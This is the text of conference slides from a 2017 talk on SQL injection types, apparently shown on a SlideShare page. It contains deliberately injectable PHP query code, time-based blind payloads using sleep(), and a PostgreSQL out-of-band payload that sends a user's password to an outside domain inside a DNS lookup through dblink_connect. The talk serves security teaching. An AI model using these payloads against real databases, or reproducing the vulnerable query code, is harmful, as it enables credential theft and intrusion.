Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Out-of-band SQL Injection Attacks (#cypsec'17)

210 vues

Publié le

Cyprus Cyber Security Conference, Out-of-band SQL Injection Attacks, cypsec.org

Publié dans : Technologie
  • Soyez le premier à commenter

  • Soyez le premier à aimer ceci

Out-of-band SQL Injection Attacks (#cypsec'17)

  1. 1. Out-of-band SQL Injection Attacks Cyprus Cyber Security Conference, #CypSec’17 Omer Citak, May 2017
  2. 2. whoami Security Researcher @ Netsparker Ltd. Developer @ Another Times Writer @ Ethical Hacking “Offensive & Defensive” Book Blog: omercitak.com All Social Platform: @Om3rCitak
  3. 3. sql injection ● Inband ○ Error Based ● Indirect Inference ○ Boolean Based ○ Blind (Time Based) ● Out-of-band ○ Blind (HTTP, DNS)
  4. 4. sql injection ● Inband ○ Error Based .... ini_set('display_errors', 'On'); error_reporting(E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); ...
  5. 5. sql injection ● Inband ○ Error Based
  6. 6. sql injection ● Indirect Inference ○ Boolean Based .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); $row_count = mysql_num_rows($results); if($row_count > 0) echo 'user exist'; else echo 'user not exist'; ...
  7. 7. sql injection ● Indirect Inference ○ Boolean Based
  8. 8. sql injection ● Indirect Inference ○ Blind (Time Based) .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE username like '%".$_GET["username"]."%'"; $results = mysql_query($sql); ...
  9. 9. sql injection ● Indirect Inference ○ Blind (Time Based)
  10. 10. sql injection ● Indirect Inference ○ Blind (Time Based) payload> ay' and if(substring(user(),1,1) = 'r', sleep(3), false) --
  11. 11. sql injection ● Indirect Inference ○ Blind (Time Based) payload> ay' and if(substring(user(),1,1) = 'a', sleep(3), false) --
  12. 12. sql injection ● Out-of-band ○ Blind (HTTP, DNS) .... ini_set('display_errors', 'Off'); error_reporting(~E_ALL); $sql = "SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')"; $results = pg_query($sql); ...
  13. 13. demo ● dependencies; ○ 1 DNS server => 207.154.221.107 ■ Ubuntu 16 ■ Spiderlab Responder ○ 1 app & database server => 46.101.229.160 ■ Ubuntu 16 ■ Php7 ■ Postgresql 9.5 and 1 unit attacker
  14. 14. demo SELECT * FROM users WHERE (username like '%".$_GET["param"]."%')
  15. 15. demo SELECT * FROM users WHERE (username like '% '||'test'||'%')
  16. 16. demo SELECT * FROM users WHERE (username like '% '|| cast(test as numeric) ||'%')
  17. 17. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(test) as numeric) ||'%')
  18. 18. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect()) as numeric) ||'%')
  19. 19. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host=test.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
  20. 20. demo SELECT * FROM users WHERE (username like '% '|| cast(SELECT(dblink_connect('host='||(select password from users where id=7)||'.omercitak.net user=a password=a connect_timeout=2')) as numeric) ||'%')
  21. 21. demo
  22. 22. where is the guvenlik?
  23. 23. thanks www.omercitak.com All Social Platform: @Om3rCitak

×